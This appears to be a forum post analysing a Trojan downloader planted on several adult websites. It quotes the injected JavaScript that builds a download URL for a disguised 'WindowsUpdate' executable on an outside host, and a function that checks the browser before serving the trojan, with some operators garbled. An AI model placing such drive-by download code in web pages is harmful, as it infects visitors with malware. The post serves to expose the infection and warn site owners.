|
Yes, Cosis, you are right.
And pornno.com and snakesworld.com install the same Trojan.DownLoader version from rockyspornpalace.com
First downloaded file name is WindowsUpdate[random number].exe
Here is javascript line which creates URL:
burl="http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
beemk, snakesworld has it at the bottom of page but upper then </BODY> tag, pornno has it in the begining of Asians section, so I doubt host can do it.
I do not think they are hackers of course, looks like they do it for money.
thurbs, you are right, here is function from snakesworld/pornno trojan downloader which decides to download trojan or not:
function BadBrowser()
{
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
if(!navigator.cookieEnabled)
return 1;
if(navigator.platform!="Win32")
return 1;
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}
Snake, if your site IP is not 64.158.30.220 check your nameserver.
|